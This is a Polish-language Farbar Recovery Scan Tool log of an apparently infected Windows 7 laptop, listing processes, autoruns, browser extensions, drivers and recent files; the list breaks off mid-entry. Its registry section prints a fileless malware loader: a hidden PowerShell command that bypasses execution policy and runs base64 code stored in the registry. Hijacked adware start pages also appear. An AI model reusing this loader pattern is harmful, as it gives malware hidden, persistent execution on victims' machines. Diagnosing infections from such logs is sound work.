Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x86) Wersja:27-04-2016 Uruchomiony przez Dominik (administrator) GATEWAY (30-04-2016 12:42:54) Uruchomiony z C:\Users\Dominik\Downloads Załadowane profile: Dominik (Dostępne profile: Dominik) Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka nie została wykryta!) Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (Microsoft Corporation) C:\Windows\System32\wisptis.exe (DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (Microsoft Corporation) C:\Windows\System32\wisptis.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Motorola Inc.) C:\Program Files\Motorola\SMSERIAL\sm56hlpr.exe () C:\Program Files\Unlocker\UnlockerAssistant.exe (Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv.exe (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera_crashreporter.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera.exe (Opera Software) C:\Program Files\Opera\36.0.2130.65\opera.exe ==================== Rejestr (filtrowane) =========================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [SMSERIAL] => C:\Program Files\Motorola\SMSERIAL\sm56hlpr.exe [1458176 2009-10-26] (Motorola Inc.) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3518632 2015-05-29] (Synaptics Incorporated) HKLM\...\Run: [UnlockerAssistant] => C:\Program Files\Unlocker\UnlockerAssistant.exe [17408 2010-07-04] () HKU\S-1-5-21-3047276897-3179028656-1573973646-1000\...\Run: [{9CD57532-9BB5-459D-B5D5-840D5AAED44D}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NUECUUXTIQBZHBX').ILBYHCJBDSD))); HKU\S-1-5-21-3047276897-3179028656-1573973646-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 GroupPolicy: Ograniczenia - Chrome <======= UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 192.168.1.1 Tcpip\..\Interfaces\{7A73741E-5A8E-470E-920E-7F332EA157E9}: [DhcpNameServer] 192.168.8.1 192.168.8.1 Tcpip\..\Interfaces\{8BE67B95-39CE-40DC-9FC7-E0B23CB87116}: [DhcpNameServer] 192.168.8.1 192.168.8.1 Tcpip\..\Interfaces\{FB87FE32-BF98-4DC2-811A-1E83A356BFE2}: [DhcpNameServer] 192.168.1.1 192.168.1.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKU\S-1-5-21-3047276897-3179028656-1573973646-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-21-3047276897-3179028656-1573973646-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch SearchScopes: HKLM -> DefaultScope - brak wartości FireFox: ======== FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-11] () FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] () FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Brak pliku] FF Plugin: @nokia.com/EnablerPlugin -> C:\Program Files\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] ( ) FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-31] (Google Inc.) FF HKLM\...\Firefox\Extensions: [{98D77B61-C5A0-4C7C-bDB2-7030906F75CA}] - C:\Program Files\groover210120160422\Firefox\{98D77B61-C5A0-4C7C-bDB2-7030906F75CA}.xpi => nie znaleziono Chrome: ======= CHR HomePage: Profile 1 -> hxxps://www.google.com/ CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www2.delta-search.com/?babsrc=HP_ss&mntrId=0C69000BDB3E7EAE&affID=119357&tsp=5010","hxxp://www.key-find.com/?type=hp&ts=1425308643&from=cor&uid=ST9120823AS_5NJ0NCB9XXXX5NJ0NCB9","hxxp://www.mystartsearch.com/?type=hp&ts=1426252851&from=wpc&uid=ST9120823AS_5NJ0NCB9XXXX5NJ0NCB9","hxxp://www.mystartsearch.com/?type=hppp&ts=1433346571&z=7fcb52c0bd753225b3791begaz3c9cfc9zeq1w8maz&from=cmi&uid=HitachiXHTS543280L9A300_081222FB2100LBC55KLBX","hxxp://www.yessearches.com/?mode=nnnb&ptid=ior&uid=62543580826BC6DB98C0757D2C0E3B36&v=20160202&ts=AHEpBH8lAX0qAU.." CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Prezentacje Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-21] CHR Extension: (Desktop US Weather Radar) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\acnkplahjeepjhacnmooibhpmdgfilkf [2016-02-23] CHR Extension: (Tłumacz dla wszystkich języków) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\amdeidgbmcliegnpcbbkhlflkbdpomhk [2016-02-23] CHR Extension: (Dokumenty Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-21] CHR Extension: (Dysk Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-21] CHR Extension: (Zoho Assist - Free Remote Access Software) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgikopmemebmoikndmhapkhaaboapige [2016-02-23] CHR Extension: (YouTube) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-21] CHR Extension: (DOWNTOWN MAFIA - FREE) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmiejicldkfmadkeagkbnafjcbgbddmo [2016-02-23] CHR Extension: (Striker Manager) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\chmachfiimeggafocgeldapnchdnoiib [2016-02-23] CHR Extension: (Google Search) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-21] CHR Extension: (RealPlayer Cloud) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\damemajnpodbdjndboidpmfpjlabocje [2016-02-23] CHR Extension: (Zombie Battlefield) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\dechhclflojackocolmlmfnhhikccoaf [2016-02-23] CHR Extension: (Android Application) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\dmmncpgjaaloalbpijeaphmmpmdpcjkf [2016-02-23] CHR Extension: (Allegro.pl - Top 50 najlepszych aukcji) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejgfedbanaogogoaekholefmiepogbbh [2016-02-23] CHR Extension: (Kalendarz Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2016-02-23] CHR Extension: (Eternal Saga) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejlofkcpcolcdnolbpofinmccmnfbpdd [2016-02-23] CHR Extension: (Arkusze Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-21] CHR Extension: (Dokumenty Google offline) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-22] CHR Extension: (Klejnoty Quest) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghinojlokimkacfpnpaimmldijliiboe [2016-02-23] CHR Extension: (Anyfile Notepad) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghlichmdnegmcpafgmmlpkegmcndlndi [2016-02-23] CHR Extension: (Street Games) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\hihpgkfdambdkamkapdeklbkbokgambc [2016-02-23] CHR Extension: (AirDroid) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\hkgndiocipalkpejnpafdbdlfdjihomd [2016-02-23] CHR Extension: (Android Games) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmlnkhebhniehfemfibiklnalehfgjjm [2016-02-23] CHR Extension: (mysms - SMS from Computer) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnkkehjnlfplmdnallbjjdnokolhblgb [2016-02-23] CHR Extension: (Arcane Legends) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibmlkgieigeddcedpbijnpojheoddido [2016-02-23] CHR Extension: (King Of Fighters) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihfklchdfkaeooekfebgcjglndfeijfg [2016-02-23] CHR Extension: (SoundCloud) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipebkipbeggmmkjjljenoblnfaenambp [2016-02-23] CHR Extension: (Funky Karts) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbgibbcljlbkkeaogjofolcbakcokmie [2016-02-23] CHR Extension: (Kalkulator) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\joodangkbfjnajiiifokapkpmhfnpleo [2016-02-23] CHR Extension: (Adres IP) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpnjjlbngpejmmhgcaagljaomgnginml [2016-02-23] CHR Extension: (Speedtest.net) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\kabkiphacephdnjaeciclbmkkmacoebe [2016-02-23] CHR Extension: (WorkFlowy) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\koegeopamaoljbmhnfjbclbocehhgmkm [2016-02-23] CHR Extension: (Google Play) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\komhbcfkdcgmcdoenjcjheifdiabikfi [2016-02-23] CHR Extension: (Crash Bandicoot Online) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhepooipcedldanchhblpepiijkpihmo [2016-02-23] CHR Extension: (Top Eleven) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2016-02-23] CHR Extension: (Mapy Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2016-02-23] CHR Extension: (Soccer Manager 2016) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgflcgkbkakaebalmamephfaenpcihbj [2016-02-23] CHR Extension: (Until AM for Chrome) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjafmkicbmhcbapadecadciafbkecofl [2016-02-23] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-21] CHR Extension: (Wunderlist for Chrome) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojcflmmmcfpacggndoaaflkmcoblhnbh [2016-02-23] CHR Extension: (Weather Underground) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjejbgheonogbpfkkjigbmahaljipoej [2016-02-23] CHR Extension: (Gmail) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-21] CHR Profile: C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Prezentacje Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-25] CHR Extension: (Dokumenty Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-25] CHR Extension: (Dysk Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-25] CHR Extension: (YouTube) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-25] CHR Extension: (Google Search) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-25] CHR Extension: (Arkusze Google) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-25] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-17] CHR Extension: (Gmail) - C:\Users\Dominik\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-25] ==================== Usługi (filtrowane) ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 BstHdAndroidSvc; C:\Program Files\BlueStacks\HD-Service.exe [437880 2015-10-08] (BlueStack Systems, Inc.) S3 BstHdLogRotatorSvc; C:\Program Files\BlueStacks\HD-LogRotatorService.exe [417400 2015-10-08] (BlueStack Systems, Inc.) S3 BstHdUpdaterSvc; C:\Program Files\BlueStacks\HD-UpdaterService.exe [855672 2015-10-08] (BlueStack Systems, Inc.) S3 ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [383640 2016-02-05] () R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (DEVGURU Co., LTD.) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [209576 2015-05-29] (Synaptics Incorporated) S3 SystemUsageReportSvc_WILLAMETTE; C:\Program Files\Intel Driver Update Utility\SUR\SurSvc.exe [115864 2016-02-05] () S3 USER_ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [383640 2016-02-05] () S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation) ===================== Sterowniki (filtrowane) ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R1 Amfilter; C:\Windows\System32\DRIVERS\Amfilter.sys [8704 2000-01-01] ((Standard mouse types)) [Brak podpisu cyfrowego] S3 Amusbprt; C:\Windows\System32\DRIVERS\Amusbprt.sys [13824 2000-01-01] ((Standard mouse types)) [Brak podpisu cyfrowego] R2 BstHdDrv; C:\Program Files\BlueStacks\HD-Hypervisor-x86.sys [132216 2015-10-08] (BlueStack Systems) R3 FinePnt; C:\Windows\System32\DRIVERS\FpHidDrv.sys [24736 2006-10-30] (FinePoint Innovations) R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2016-02-17] (REALiX(tm)) R3 igfx; C:\Windows\System32\DRIVERS\igdkmd32.sys [4815872 2012-03-23] (Intel Corporation) [Brak podpisu cyfrowego] R3 MSTabBtn; C:\Windows\System32\DRIVERS\mstabbtn.sys [10496 2007-03-09] (Quanta Computer Inc.) R3 NETwLv32; C:\Windows\System32\DRIVERS\NETwLv32.sys [6639616 2016-02-17] (Intel Corporation) S3 PCAMp50; C:\Windows\System32\Drivers\PCAMp50.sys [28224 2008-09-11] (Printing Communications Assoc., Inc. (PCAUSA)) S3 PCASp50; C:\Windows\System32\Drivers\PCASp50.sys [27072 2008-09-11] (Printing Communications Assoc., Inc. (PCAUSA)) R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [17160 2015-03-05] () S3 pwdspio; C:\Windows\system32\pwdspio.sys [13064 2015-03-05] () R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [113984 2015-10-30] (Power Software Ltd) U5 AppMgmt; C:\Windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 CFcatchme; \??\C:\Users\Dominik\AppData\Local\Temp\CFcatchme.sys [X] S3 cpuz138; \??\C:\Users\Dominik\AppData\Local\Temp\cpuz138\cpuz138_x32.sys [X] S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] S3 hwusbfake; system32\DRIVERS\ewusbfake.sys [X] S3 hwusb_cdcacm; system32\DRIVERS\ew_cdcacm.sys [X] S3 hwusb_wwanecm; system32\DRIVERS\ew_wwanecm.sys [X] S3 massfilter_lte; \??\C:\Windows\system32\drivers\massfilter_lte.sys [X] U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [4096 2010-07-04] () [Brak podpisu cyfrowego] S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X] S3 zgdcat; system32\DRIVERS\zgdcat.sys [X] S3 zgdcdiag; system32\DRIVERS\zgdcdiag.sys [X] S3 zgdcmdm; system32\DRIVERS\zgdcmdm.sys [X] S3 zgdcnet; system32\DRIVERS\zgdcnet.sys [X] S3 zgdcnmea; system32\DRIVERS\zgdcnmea.sys [X] S1 {25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw; system32\drivers\{25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2016-04-30 12:42 - 2016-04-30 12:43 - 00018645 _____ C:\Users\Dominik\Downloads\FRST.txt 2016-04-30 12:42 - 2016-04-30 12:42 - 00000000 ____D C:\FRST 2016-04-30 12:41 - 2016-04-30 12:41 - 01728000 _____ (Farbar) C:\Users\Dominik\Downloads\FRST.exe 2016-04-28 22:56 - 2016-04-28 22:56 - 00011329 _____ C:\Users\Dominik\Desktop\gmer 2.2.19882 txt.txt 2016-04-28 22:09 - 2016-04-28 22:09 - 00380928 _____ C:\Users\Dominik\Downloads\ufusvlow.exe 2016-04-28 21:53 - 2016-04-28 22:00 - 00000000 ____D C:\Program Files\Unlocker 2016-04-28 21:53 - 2016-04-28 21:53 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker 2016-04-28 21:52 - 2016-04-28 21:52 - 01078591 _____ C:\Users\Dominik\Desktop\Unlocker1.9.2.exe 2016-04-28 21:47 - 2016-04-28 21:47 - 00000000 ___HD C:\$Windows.~WS 2016-04-28 21:40 - 2016-04-28 21:41 - 00000000 ____D C:\Windows\pss 2016-04-28 21:39 - 2016-04-28 21:39 - 00163594 _____ C:\Users\Dominik\Documents\cc_20160428_213926.reg 2016-04-28 21:38 - 2016-04-28 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner 2016-04-28 21:38 - 2016-04-28 21:38 - 00000000 ____D C:\Program Files\CCleaner 2016-04-28 20:54 - 2016-04-28 20:55 - 06882192 _____ (Piriform Ltd) C:\Users\Dominik\Desktop\ccsetup517.exe 2016-04-28 20:04 - 2016-04-28 20:21 - 00000000 ____D C:\Windows\erdnt 2016-04-28 19:51 - 2011-01-14 21:54 - 00000000 ____D C:\Users\Dominik\Downloads\bios 2016-04-28 19:39 - 2016-04-28 19:39 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Netia 2016-04-28 13:11 - 2016-04-28 13:11 - 10031422 _____ C:\Users\Dominik\Downloads\Playstation-2-Bios-Pack.7z 2016-04-27 07:54 - 2016-04-28 20:20 - 00085248 _____ C:\Windows\system32\Drivers\a8c0c7783213ab2.sys 2016-04-22 06:11 - 2016-04-22 06:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Delta 2016-04-22 02:24 - 2016-04-22 04:28 - 00000000 ____D C:\$WINDOWS.~BT 2016-04-22 02:18 - 2016-04-22 02:18 - 00000000 ____D C:\ESD 2016-04-21 23:30 - 2016-04-21 23:31 - 07635472 _____ (Microsoft Corporation) C:\Users\Dominik\Desktop\GetWindows10-Web_Default_Attr.exe 2016-04-21 17:29 - 2016-04-21 17:29 - 00000965 _____ C:\Users\Public\Desktop\PLAY ONLINE.lnk 2016-04-21 17:29 - 2016-04-21 17:29 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PLAY ONLINE 2016-04-21 17:29 - 2008-09-26 18:04 - 00621056 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys 2016-04-21 17:29 - 2008-09-26 18:04 - 00113152 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbnet.sys 2016-04-21 17:29 - 2008-09-26 18:04 - 00101760 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys 2016-04-21 17:29 - 2008-09-26 18:03 - 00023424 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys 2016-04-19 04:42 - 2016-04-28 19:41 - 00000000 ____D C:\Windows\system32\SupportAppCB 2016-04-19 04:42 - 2016-04-19 04:42 - 00005612 _____ C:\debug1214.txt 2016-04-19 04:42 - 2010-01-29 10:39 - 00114688 _____ (ZTE Corporation) C:\Windows\system32\Drivers\ZTEusbnet.sys 2016-04-19 04:42 - 2010-01-18 11:21 - 00105088 _____ (ZTE Incorporated) C:\Windows\system32\Drivers\ZTEusbnmea.sys 2016-04-19 04:42 - 2010-01-18 11:21 - 00105088 _____ (ZTE Incorporated) C:\Windows\system32\Drivers\ZTEusbmdm6k.sys 2016-04-19 04:42 - 2010-01-18 11:21 - 00009216 _____ (ZTE Incorporated) C:\Windows\system32\Drivers\massfilter.sys 2016-04-19 04:42 - 2010-01-18 11:20 - 00105088 _____ (ZTE Incorporated) C:\Windows\system32\Drivers\ZTEusbser6k.sys 2016-04-19 03:40 - 2016-04-19 03:40 - 19607040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 12829696 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 04305920 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-04-19 03:40 - 2016-04-19 03:40 - 02278912 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 02052608 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-04-19 03:40 - 2016-04-19 03:40 - 01950720 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 01309696 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00645120 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat 2016-04-19 03:40 - 2016-04-19 03:40 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00478208 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00342728 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-04-19 03:40 - 2016-04-19 03:40 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00233472 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll 2016-04-19 03:40 - 2016-04-19 03:40 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2016-04-19 03:40 - 2016-04-19 03:40 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll 2016-04-19 03:40 - 